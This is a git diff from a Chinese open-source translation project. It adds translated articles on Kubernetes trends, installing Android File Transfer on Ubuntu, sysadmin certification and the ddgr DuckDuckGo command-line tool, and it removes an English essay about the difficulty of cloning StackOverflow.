Remember Linux Commands.md b/published/201711/20171117 How to Easily Remember Linux Commands.md similarity index 100% rename from published/20171117 How to Easily Remember Linux Commands.md rename to published/201711/20171117 How to Easily Remember Linux Commands.md diff --git a/published/20171118 Getting started with OpenFaaS on minikube.md b/published/201711/20171118 Getting started with OpenFaaS on minikube.md similarity index 100% rename from published/20171118 Getting started with OpenFaaS on minikube.md rename to published/201711/20171118 Getting started with OpenFaaS on minikube.md diff --git a/published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md similarity index 100% rename from published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md rename to published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md diff --git a/published/20171120 Containers and Kubernetes Whats next.md b/published/20171120 Containers and Kubernetes Whats next.md new file mode 100644 index 0000000000..57f9379f7b --- /dev/null +++ b/published/20171120 Containers and Kubernetes Whats next.md @@ -0,0 +1,81 @@ +容器技术和 K8S 的下一站 +============================================================ +> 想知道容器编排管理和 K8S 的最新展望么?来看看专家怎么说。 + +![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") + +如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 + +来自 [The new stack][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成使用者正在将 Kubernetes(K8S)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 K8S 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8S ,但是百分之五十八的人员表示他们正在计划和准备使用 K8S。总而言之,容器和 Kubernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对 Robinson 和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 K8S 的下一步发展。 + +### 容器编排将被主流接受 + +像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 + +### 更好的易用性 + +人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的或单个的以隔离方式运行的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 + +### 在混合云以及多云技术方面会有更多侧重 + +随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [混合云][11] 和 [多云][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,“容器和 K8S 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。” +据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 + +**[ 想知道 CIO 们对混合云和多云的战略构想么? 请参看我们的这条相关资源, [Hybrid Cloud: The IT leader's guide][16]。 ]** + +### 平台和工具的持续整合及加强 + +对任何一种科技来说,持续的整合和加强从来都是大势所趋;容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8S 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其它的一些小众平台方案。因为 K8S 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8S 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”cloud-neutral。 + +### K8S 的下一站 + +来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,K8S 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 K8S,K8S 仍有很长的路要走。 + +专家们对[日益流行的 K8S 平台][19]也作出了以下一些预测: + +**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 K8S 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 K8S 上部署和监控微应用将会带来很多新的可能性。” + +**_来自 Red Hat 的 Brian Gracely 表示:_** “K8S 所支持的应用的种类越来越多。今后在 K8S 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用、大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” + +**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 K8S 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 K8S 将和第三方管理和监控平台融合起来。” + +**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其它运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [编辑提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” + +**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ K8S 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 K8S 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 K8S 平台内部以及在外部服务商一端做出的一些改进。” + +------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next + +作者:[Kevin Casey][a] +译者:[yunfengHe](https://github.com/yunfengHe) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/kevin-casey +[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats +[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity +[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ +[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf +[5]:https://thenewstack.io/ +[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[7]:https://www.cockroachlabs.com/ +[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[9]:https://codemill.se/ +[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA +[11]:https://enterprisersproject.com/hybrid-cloud +[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference +[13]:https://enterprisersproject.com/user/brian-gracely +[14]:https://www.redhat.com/en +[15]:https://www.cloudbees.com/ +[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ +[17]:https://www.sumologic.com/ +[18]:http://alcide.io/ +[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english +[20]:http://opentracing.io/ +[21]:https://istio.io/ +[22]:http://cri-o.io/ +[23]:https://opensource.com/article/17/2/stateful-applications +[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 +[25]:https://enterprisersproject.com/user/kevin-casey diff --git a/published/20171124 How to Install Android File Transfer for Linux.md b/published/20171124 How to Install Android File Transfer for Linux.md new file mode 100644 index 0000000000..3cdb372c93 --- /dev/null +++ b/published/20171124 How to Install Android File Transfer for Linux.md @@ -0,0 +1,75 @@ +如何在 Linux 下安装安卓文件传输助手 +=============== + +如果你尝试在 Ubuntu 下连接你的安卓手机,你也许可以试试 Linux 下的安卓文件传输助手。 + +本质上来说,这个应用是谷歌 macOS 版本的一个克隆。它是用 Qt 编写的,用户界面非常简洁,使得你能轻松在 Ubuntu 和安卓手机之间传输文件和文件夹。 + +现在,有可能一部分人想知道有什么是这个应用可以做,而 Nautilus(Ubuntu 默认的文件资源管理器)不能做的,答案是没有。 + +当我将我的 Nexus 5X(记得选择 [媒体传输协议 MTP][7] 选项)连接在 Ubuntu 上时,在 [GVfs][8](LCTT 译注: GNOME 桌面下的虚拟文件系统)的帮助下,我可以打开、浏览和管理我的手机,就像它是一个普通的 U 盘一样。 + +[![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] + +但是*一些*用户在使用默认的文件管理器时,在 MTP 的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 + +这就是要为 Linux 系统用户设计一个安卓文件传输助手应用的原因,将这个应用当做将 MTP 设备安装在 Linux 下的另一种选择。如果你使用 Linux 下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 + + +![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) + +该 app 特点: + +*   简洁直观的用户界面 +*   支持文件拖放功能(从 Linux 系统到手机) +*   支持批量下载 (从手机到 Linux系统) +*   显示传输进程对话框 +*   FUSE 模块支持 +*   没有文件大小限制 +*   可选命令行工具 + +### Ubuntu 下安装安卓手机文件助手的步骤 + +以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 + +这有一个 [PPA](个人软件包集)源为 Ubuntu 14.04 LTS、16.04 LTS 和 Ubuntu 17.10 提供可用应用。 + +为了将这一 PPA 加入你的软件资源列表中,执行这条命令: + +``` +sudo add-apt-repository ppa:samoilov-lex/aftl-stable +``` + +接着,为了在 Ubuntu 下安装 Linux版本的安卓文件传输助手,执行: + +``` +sudo apt-get update && sudo apt install android-file-transfer +``` + +这样就行了。 + +你会在你的应用列表中发现这一应用的启动图标。 + +在你启动这一应用之前,要确保没有其他应用(比如 Nautilus)已经挂载了你的手机。如果其它应用正在使用你的手机,就会显示“无法找到 MTP 设备”。要解决这一问题,将你的手机从 Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux + +作者:[JOEY SNEDDON][a] +译者:[wenwensnow](https://github.com/wenwensnow) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/app +[3]:http://www.omgubuntu.co.uk/category/download +[4]:https://github.com/whoozle/android-file-transfer-linux +[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux +[6]:http://android.com/filetransfer?linkid=14270770 +[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol +[8]:https://en.wikipedia.org/wiki/GVfs +[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg +[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable diff --git a/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md new file mode 100644 index 0000000000..9b6a4f242c --- /dev/null +++ b/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -0,0 +1,72 @@ +开源云技能认证:系统管理员的核心竞争力 +========= + +![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") + +> [2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员往往能获得更高的薪酬。 + + +报告调查的受访者中,53% 认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,技术娴熟的系统管理员更受青睐而收获高薪职位,但这一职位,并没想象中那么容易填补。 + +系统管理员主要负责服务器和其他电脑操作系统的安装、服务支持和维护,及时处理服务中断和预防其他问题的出现。 + +总的来说,今年的报告指出开源领域人才需求最大的有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%)。 + +此外,报告对人事经理的调查显示,58% 期望招揽更多的开源人才,67% 认为开源人才的需求增长会比业内其他领域更甚。有些单位视开源人才为招聘最优选则,它们招聘的开源人才较上年增长了 2 个百分点。 + +同时,89% 的人事经理认为很难找到颇具天赋的开源人才。 + +### 为什么要获取认证 + +报告显示,对系统管理员的需求刺激着人事经理为 53% 的组织/机构提供正规的培训和专业技术认证,而这一比例去年为 47%。 + +对系统管理方面感兴趣的 IT 人才考虑获取 Linux 认证已成为行业规律。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3] 认证是入门级 Linux 系统管理员的最高认证;如果想胜任高级别的系统管理员职位,获取[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是不可或缺的。 + +戴士(Dice)[2017 技术行业薪资调查][6]显示,2016 年系统管理员的薪水为 79,538 美元,较上年下降了 0.8%;系统架构师的薪水为 125,946 美元,同比下降 4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 + +在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士 2017 技术行业薪资调查中排第一。在计算机网络和数据库领域,掌握 OpenVMS 操作系统技术也能获得高薪。 + +### 成为出色的系统管理员 + +出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备应对可能出现的状况。这个职位追求“零责备的、精益的、流程或技术上交互式改进的”思维方式和善于自我完善的人格,成为一个系统管理员意味着“你必将与开源软件如 Linux、BSD 甚至开源 Solaris 等结下不解之缘”,Paul English ^译注1 在 [opensource.com][7] 上发文指出。 + +Paul English 认为,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 + +>译注1:Paul English,计算机科学学士,UNIX/Linux 系统管理员,PreOS Security Inc. 公司 CEO,2015-2017 年于为推动系统管理员发展实践的非盈利组织——专业系统管理员联盟League of Professional System Administrator担任董事会成员。 + +### 展望 2018 + +[Robert Half 2018 年技术人才薪资导览][8]预测 2018 年北美地区许多单位将聘用大量系统管理方面的专业人才,同时个人软实力和领导力水平作为优秀人才的考量因素,越来越受到重视。 + +该报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,也是 IT 从业者必须具备的重要技能,特别是从事服务台和桌面支持工作相关的技术人员。” + +这与[Linux基金会][9]^译注2 提出的不同阶段的系统管理员必备技能相一致,都强调了强大的分析能力和快速处理问题的能力。 + +>译注2:Linux 基金会The Linux Foundation,成立于 2000 年,致力于围绕开源项目构建可持续发展的生态系统,以加速开源项目的技术开发和商业应用;它是世界上最大的开源非盈利组织,在推广、保护和推进 Linux 发展,协同开发,维护“历史上最大的共享资源”上功勋卓越。 + +如果想逐渐爬上系统管理员职位的金字塔上层,还应该对系统配置的结构化方法充满兴趣;且拥有解决系统安全问题的经验;用户身份验证管理的经验;与非技术人员进行非技术交流的能力;以及优化系统以满足最新的安全需求的能力。 + +- [下载][10]2017年开源工作报告全文,以获取更多信息。 + + +----------------------- + +via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins + +作者:[linux.com][a] +译者:[wangy325](https://github.com/wangy325) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins +[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx +[4]:https://www.redhat.com/en/services/certification/rhce +[5]:https://www.redhat.com/en/services/certification/rhcsa +[6]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 +[7]:https://opensource.com/article/17/7/truth-about-sysadmins +[8]:https://www.roberthalf.com/salary-guide/technology +[9]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 +[10]:http://bit.ly/2017OSSjobsreport \ No newline at end of file diff --git a/published/20171130 Search DuckDuckGo from the Command Line.md b/published/20171130 Search DuckDuckGo from the Command Line.md new file mode 100644 index 0000000000..48b6fdd830 --- /dev/null +++ b/published/20171130 Search DuckDuckGo from the Command Line.md @@ -0,0 +1,97 @@ +在命令行中使用 DuckDuckGo 搜索 +============= + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) + +此前我们介绍了[如何在命令行中使用 Google 搜索][3]。许多读者反馈说他们平时使用 [Duck Duck Go][4],这是一个功能强大而且保密性很强的搜索引擎。 + +正巧,最近出现了一款能够从命令行搜索 DuckDuckGo 的工具。它叫做 ddgr(我把它读作 “dodger”),非常好用。 + +像 [Googler][7] 一样,ddgr 是一个完全开源而且非官方的工具。没错,它并不属于 DuckDuckGo。所以,如果你发现它返回的结果有些奇怪,请先询问这个工具的开发者,而不是搜索引擎的开发者。 + +### DuckDuckGo 命令行应用 + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) + +[DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站 omgubuntu_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 + +和网页版不同的是,你可以更改每页返回多少结果。这比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 + +`ddgr` 有许多功能和亮点,包括: + +* 更改搜索结果数 +* 支持 Bash 自动补全 +* 使用 DuckDuckGo Bangs +* 在浏览器中打开链接 +* ”手气不错“选项 +* 基于时间、地区、文件类型等的筛选功能 +* 极少的依赖项 + +你可以从 Github 的项目页面上下载支持各种系统的 `ddgr`: + +- [从 Github 下载 “ddgr”][9] + +另外,在 Ubuntu 16.04 LTS 或更新版本中,你可以使用 PPA 安装 ddgr。这个仓库由 ddgr 的开发者维护。如果你想要保持在最新版本的话,推荐使用这种方式安装。 + +需要提醒的是,在本文创作时,这个 PPA 中的 ddgr _并不是_ 最新版本,而是一个稍旧的版本(缺少 -num 选项)。 + +使用以下命令添加 PPA: + +``` +sudo add-apt-repository ppa:twodopeshaggy/jarun +sudo apt-get update +``` + +### 如何使用 ddgr 在命令行中搜索 DuckDuckGo + +安装完毕后,你只需打开你的终端模拟器,并运行: + +``` +ddgr +``` + +然后输入查询内容: + +``` +search-term +``` + +你可以限制搜索结果数: + +``` +ddgr --num 5 search-term +``` + +或者自动在浏览器中打开第一条搜索结果: + + +``` +ddgr -j search-term +``` + +你可以使用参数和选项来提高搜索精确度。使用以下命令来查看所有的参数: + +``` +ddgr -h +``` + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app + +作者:[JOEY SNEDDON][a] +译者:[yixunx](https://github.com/yixunx) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/download +[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line +[4]:http://duckduckgo.com/ +[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app +[6]:https://github.com/jarun/ddgr +[7]:https://github.com/jarun/googler +[8]:https://duckduckgo.com/bang +[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 diff --git a/sources/tech/20090701 The One in Which I Call Out Hacker News.md b/sources/tech/20090701 The One in Which I Call Out Hacker News.md deleted file mode 100644 index 44c751dd5a..0000000000 --- a/sources/tech/20090701 The One in Which I Call Out Hacker News.md +++ /dev/null @@ -1,86 +0,0 @@ -translating by hopefully2333 - -# [The One in Which I Call Out Hacker News][14] - - -> “Implementing caching would take thirty hours. Do you have thirty extra hours? No, you don’t. I actually have no idea how long it would take. Maybe it would take five minutes. Do you have five minutes? No. Why? Because I’m lying. It would take much longer than five minutes. That’s the eternal optimism of programmers.” -> -> — Professor [Owen Astrachan][1] during 23 Feb 2004 lecture for [CPS 108][2] - -[Accusing open-source software of being a royal pain to use][5] is not a new argument; it’s been said before, by those much more eloquent than I, and even by some who are highly sympathetic to the open-source movement. Why go over it again? - -On Hacker News on Monday, I was amused to read some people saying that [writing StackOverflow was hilariously easy][6]—and proceeding to back up their claim by [promising to clone it over July 4th weekend][7]. Others chimed in, pointing to [existing][8] [clones][9] as a good starting point. - -Let’s assume, for sake of argument, that you decide it’s okay to write your StackOverflow clone in ASP.NET MVC, and that I, after being hypnotized with a pocket watch and a small club to the head, have decided to hand you the StackOverflow source code, page by page, so you can retype it verbatim. We’ll also assume you type like me, at a cool 100 WPM ([a smidge over eight characters per second][10]), and unlike me,  _you_  make zero mistakes. StackOverflow’s *.cs, *.sql, *.css, *.js, and *.aspx files come to 2.3 MB. So merely typing the source code back into the computer will take you about eighty hours if you make zero mistakes. - -Except, of course, you’re not doing that; you’re going to implement StackOverflow from scratch. So even assuming that it took you a mere ten times longer to design, type out, and debug your own implementation than it would take you to copy the real one, that already has you coding for several weeks straight—and I don’t know about you, but I am okay admitting I write new code  _considerably_  less than one tenth as fast as I copy existing code. - - _Well, okay_ , I hear you relent. *So not the whole thing. But I can do **most** of it.* - -Okay, so what’s “most”? There’s simply asking and responding to questions—that part’s easy. Well, except you have to implement voting questions and answers up and down, and the questioner should be able to accept a single answer for each question. And you can’t let people upvote or accept their own answers, so you need to block that. And you need to make sure that users don’t upvote or downvote another user too many times in a certain amount of time, to prevent spambots. Probably going to have to implement a spam filter, too, come to think of it, even in the basic design, and you also need to support user icons, and you’re going to have to find a sanitizing HTML library you really trust and that interfaces well with Markdown (provided you do want to reuse [that awesome editor][11] StackOverflow has, of course). You’ll also need to purchase, design, or find widgets for all the controls, plus you need at least a basic administration interface so that moderators can moderate, and you’ll need to implement that scaling karma thing so that you give users steadily increasing power to do things as they go. - -But if you do  _all that_ , you  _will_  be done. - -Except…except, of course, for the full-text search, especially its appearance in the search-as-you-ask feature, which is kind of indispensable. And user bios, and having comments on answers, and having a main page that shows you important questions but that bubbles down steadily à la reddit. Plus you’ll totally need to implement bounties, and support multiple OpenID logins per user, and send out email notifications for pertinent events, and add a tagging system, and allow administrators to configure badges by a nice GUI. And you’ll need to show users’ karma history, upvotes, and downvotes. And the whole thing has to scale really well, since it could be slashdotted/reddited/StackOverflown at any moment. - -But  _then_ ! **Then** you’re done! - -…right after you implement upgrades, internationalization, karma caps, a CSS design that makes your site not look like ass, AJAX versions of most of the above, and G-d knows what else that’s lurking just beneath the surface that you currently take for granted, but that will come to bite you when you start to do a real clone. - -Tell me: which of those features do you feel you can cut and still have a compelling offering? Which ones go under “most” of the site, and which can you punt? - -Developers think cloning a site like StackOverflow is easy for the same reason that open-source software remains such a horrible pain in the ass to use. When you put a developer in front of StackOverflow, they don’t really  _see_ StackOverflow. What they actually  _see_  is this: - -``` -create table QUESTION (ID identity primary key, - TITLE varchar(255), --- why do I know you thought 255? - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); -create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) -``` - -If you then tell a developer to replicate StackOverflow, what goes into his head are the above two SQL tables and enough HTML to display them without formatting, and that really  _is_  completely doable in a weekend. The smarter ones will realize that they need to implement login and logout, and comments, and that the votes need to be tied to a user, but that’s still totally doable in a weekend; it’s just a couple more tables in a SQL back-end, and the HTML to show their contents. Use a framework like Django, and you even get basic users and comments for free. - -But that’s  _not_  what StackOverflow is about. Regardless of what your feelings may be on StackOverflow in general, most visitors seem to agree that the user experience is smooth, from start to finish. They feel that they’re interacting with a polished product. Even if I didn’t know better, I would guess that very little of what actually makes StackOverflow a continuing success has to do with the database schema—and having had a chance to read through StackOverflow’s source code, I know how little really does. There is a  _tremendous_  amount of spit and polish that goes into making a major website highly usable. A developer, asked how hard something will be to clone, simply  _does not think about the polish_ , because  _the polish is incidental to the implementation._ - -That is why an open-source clone of StackOverflow will fail. Even if someone were to manage to implement most of StackOverflow “to spec,” there are some key areas that would trip them up. Badges, for example, if you’re targeting end-users, either need a GUI to configure rules, or smart developers to determine which badges are generic enough to go on all installs. What will actually happen is that the developers will bitch and moan about how you can’t implement a really comprehensive GUI for something like badges, and then bikeshed any proposals for standard badges so far into the ground that they’ll hit escape velocity coming out the other side. They’ll ultimately come up with the same solution that bug trackers like Roundup use for their workflow: the developers implement a generic mechanism by which anyone, truly anyone at all, who feels totally comfortable working with the system API in Python or PHP or whatever, can easily add their own customizations. And when PHP and Python are so easy to learn and so much more flexible than a GUI could ever be, why bother with anything else? - -Likewise, the moderation and administration interfaces can be punted. If you’re an admin, you have access to the SQL server, so you can do anything really genuinely administrative-like that way. Moderators can get by with whatever django-admin and similar systems afford you, since, after all, few users are mods, and mods should understand how the sites  _work_ , dammit. And, certainly, none of StackOverflow’s interface failings will be rectified. Even if StackOverflow’s stupid requirement that you have to have and know how to use an OpenID (its worst failing) eventually gets fixed, I’m sure any open-source clones will rabidly follow it—just as GNOME and KDE for years slavishly copied off Windows, instead of trying to fix its most obvious flaws. - -Developers may not care about these parts of the application, but end-users do, and take it into consideration when trying to decide what application to use. Much as a good software company wants to minimize its support costs by ensuring that its products are top-notch before shipping, so, too, savvy consumers want to ensure products are good before they purchase them so that they won’t  _have_  to call support. Open-source products fail hard here. Proprietary solutions, as a rule, do better. - -That’s not to say that open-source doesn’t have its place. This blog runs on Apache, [Django][12], [PostgreSQL][13], and Linux. But let me tell you, configuring that stack is  _not_  for the faint of heart. PostgreSQL needs vacuuming configured on older versions, and, as of recent versions of Ubuntu and FreeBSD, still requires the user set up the first database cluster. MS SQL requires neither of those things. Apache…dear heavens, don’t even get me  _started_  on trying to explain to a novice user how to get virtual hosting, MovableType, a couple Django apps, and WordPress all running comfortably under a single install. Hell, just trying to explain the forking vs. threading variants of Apache to a technically astute non-developer can be a nightmare. IIS 7 and Apache with OS X Server’s very much closed-source GUI manager make setting up those same stacks vastly simpler. Django’s a great a product, but it’s nothing  _but_  infrastructure—exactly the thing that I happen to think open-source  _does_  do well,  _precisely_  because of the motivations that drive developers to contribute. - -The next time you see an application you like, think very long and hard about all the user-oriented details that went into making it a pleasure to use, before decrying how you could trivially reimplement the entire damn thing in a weekend. Nine times out of ten, when you think an application was ridiculously easy to implement, you’re completely missing the user side of the story. - --------------------------------------------------------------------------------- - -via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ - -作者:[Benjamin Pollack][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bitquabit.com/meta/about/ -[1]:http://www.cs.duke.edu/~ola/ -[2]:http://www.cs.duke.edu/courses/cps108/spring04/ -[3]:https://bitquabit.com/categories/programming -[4]:https://bitquabit.com/categories/technology -[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ -[6]:http://news.ycombinator.com/item?id=678501 -[7]:http://news.ycombinator.com/item?id=678704 -[8]:http://code.google.com/p/cnprog/ -[9]:http://code.google.com/p/soclone/ -[10]:http://en.wikipedia.org/wiki/Words_per_minute -[11]:http://github.com/derobins/wmd/tree/master -[12]:http://www.djangoproject.com/ -[13]:http://www.postgresql.org/ -[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ diff --git a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD 